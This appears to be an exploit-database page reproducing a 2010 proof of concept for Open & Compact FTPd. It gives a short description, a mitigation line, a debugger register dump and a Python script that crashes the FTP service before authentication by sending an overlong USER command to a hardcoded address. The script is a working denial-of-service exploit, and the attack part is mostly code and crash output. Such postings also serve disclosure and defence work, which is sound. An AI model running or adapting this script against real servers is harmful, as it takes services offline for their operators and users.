header-logo
Suggest Exploit
vendor:
Open & Compact FTPd
by:
loneferret
7,5
CVSS
HIGH
DoS
20
CWE
Product Name: Open & Compact FTPd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2/SP3 Professional
2010

Open & Compact FTPd Pre-Authentication Crash (PoC)

A denial of service vulnerability exists in Open & Compact FTPd due to improper handling of user authentication requests. An attacker can send a specially crafted user authentication request with an overly long string, resulting in a crash of the service.

Mitigation:

Upgrade to the latest version of Open & Compact FTPd or apply the appropriate patch.
Source

Exploit-DB raw data:

# Title: Open & Compact FTPd Pre-Authentication Crash (PoC)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 07/02/2010
# Software link: https://sourceforge.net/projects/open-ftpd/
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team
#
# It's really just a DoS, but if someone can find more go ahead
#
#!/usr/bin/python

#Registers From Immunity 
#
#EAX FFFFFFFF
#ECX 00149A29
#EDX 7C90E4F4 ntdll.KiFastSystemCallRet
#EBX 00000000
#ESP 0012FA1C
#EBP 00000002
#ESI 0012FA5C
#EDI 0012FCB4
#EIP 004113A3
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)
#S 1  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010286 (NO,NB,NE,A,S,PE,L,LE)
#ST0 empty %#.19L
#ST1 empty -??? FFFF 7C910208 7C90E900
#ST2 empty -UNORM DCD0 7C9101BB 7C91017B
#ST3 empty %#.19L
#ST4 empty +UNORM 00B2 00000000 00000000
#ST5 empty +UNORM 7D80 77F67D78 01C3DA90
#ST6 empty -UNORM DD24 00000000 00000409
#ST7 empty -UNORM E3F4 0014E3F4 0014E3F4
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#
#Developper Informed on: 07/02/2010
#Developper Contacted second time on: 08/02/2010
#

import socket

buffer = ("\x41\x2C\x20") * 200

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.112',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)

Navigation

Suggest Exploit

Services By CQR